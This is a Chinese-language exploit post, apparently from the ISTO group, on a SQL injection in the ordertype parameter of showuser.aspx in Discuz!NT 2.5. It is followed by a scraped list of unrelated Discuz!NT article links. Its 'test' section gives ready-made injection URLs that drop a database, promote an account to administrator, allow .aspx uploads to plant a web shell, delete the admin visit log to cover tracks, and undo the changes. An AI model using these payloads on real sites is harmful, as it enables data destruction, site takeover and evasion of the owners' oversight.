Discuz!NT 2.5(20080826更新前)注入
漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
漏洞厂商:http://www.comsenz.com
漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。
漏洞测试:
http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传
得到SHELL后...
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG
http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员
ISTO 有你更精彩---
Discuz!NT 2.5(20080826更新前)注入相关推荐
- Discuz!NT 2.0正式版提供免费下载(最后更新2007-12-26)ASP.net
导读: 中国最大的互联网社区产品及服务提供商康盛创想于 11 月15 日发布旗下基于 ASP.net 平台的社区软件 Discuz!NT 2.0 正式版,用户可以免费下载. Discuz!NT 2.0 ...
- Discuz!NT 在线用户功能简介
声明:本文内容纯属个人观点,官方保留最终解释 在上文(Discuz!NT URL地址重写) 中, 聊到了"在线用户"功能,因为当时介绍的重点不是"在线" 那一块 ...
- 【转载】Discuz!NT企业版之Sphinx全文搜索
Discuz!NT企业版之Sphinx全文搜索(上) 作为Discuz!NT企业版中的一员,在设计企业级搜索架构之初,就考虑了海量数量,准实时索引更新,并发访问,安装布署等诸多方面.目前在生产环境下被 ...
- Discuz!NT控件剖析 之 DataGrid(数据列表) [原创: 附源码]
自从 9月未开始写关于"ICONIX方法"的系列文章以来,到今天已有两个多月了,当初因为兴趣点的转移才划一 段落的Discuz!NT 系列文章,从今天开始又要开始续写了.这写这个系 ...
- Discuz!NT 缓存设计简析 [原创]
作为一个社区类型软件,大并发支持和高效稳定运行永远是"硬道理",而有效安全的使用 缓存恰恰能起到事倍功半的效果.而.NET本身所提供的缓存机制又显得过于"单薄" ...
- discuz!nt论坛搬迁后出错,提示:对象名 'dnt_templates' 无效
2007年10月30日 星期二 16:23 对象名 'dnt_templates' 无效解决方法: --解决重装系统并还原论坛数据库后,数据库帐号不关联的问题. --注意请用sa帐号 进行如下操作 - ...
- Discuz!NT实际安装流程
1. Discuz!NT论坛的安装 安装前系统环境: 操作系统:XP Professional 数据库: SQL server 2005 IIS 5.1 .net FrameWork 3.5 ...
- ASP.NET网站与Discuz!NT论坛整合
1.引入5个DLL到项目中 分别是 using Discuz.Common; using Discuz.Forum; using Discuz.Config; using Discuz.Entity; ...
- Discuz NT 架构剖析之Config机制
接触了Discuz NT! 一段时间了,是时候做个总结了,标题好霸气,有木有? 都是托园子里的大牛代振军的福啊,哈哈哈哈. 首先论坛的信息不是完全存储在数据库里面的,一部分信息存储在config文件里 ...
最新文章
- HDU3371(最小生成树)
- 腾讯云微计算实践:从Serverless说起,谈谈边缘计算的未来
- 学习 TList 类的实现[5]
- python3 sys.stdout.write print 区别
- Windows 8 系列 --Block Game --随笔
- layui按钮展开、_layui框架,点击某个按钮,让layui的日期插件选中的值清空
- 51nod1676-无向图同构【乱搞】
- source insight使用教程
- LSSS线性秘密共享方案详细构造方法与原理解释试读
- 求平均数、百分率、最大值、最小值、两个字段相差秒数的SQL
- java 预览office_java在线预览office
- 计算机基础知识会议记录,电脑上会议记录怎么写?
- 利用原生JS将下载链接转换为二维码
- Python -- 使用if语句处理列表
- C++ 判断某个年份的生肖
- iOS 加粗字体方法 (不改变字体字号只加粗文字)
- Debian7.5--双屏显示问题
- 【HTML5】------- JavaScript 实现网页版HTML5发送语音功能
- Oracle开发篇---------PL/SQL DEV频繁卡顿的解决方案
- 高并发与大流量解决方案
热门文章
- 计算机科学优青,关于举办华南理工大学“海内外优秀青年学者论坛” 计算机科学与工程学院分论坛的通知...
- JavaScript——misc
- 如何让64位的windows上的IIS可以运行32位的程序
- OSChina 周日乱弹 —— 钱不还,我就当你人不在了
- Android 性能优化之String篇
- 在不同领域中典型的计算机应用实例,浅析案例教学法在《计算机应用基础》教学中应用.doc...
- Amazon DMS 在数据迁移任务可用性及对源数据归档支持的实践
- LeetCodeOJ. Count and Say
- HTML CSS 程序员花式表白
- JConsole远程连接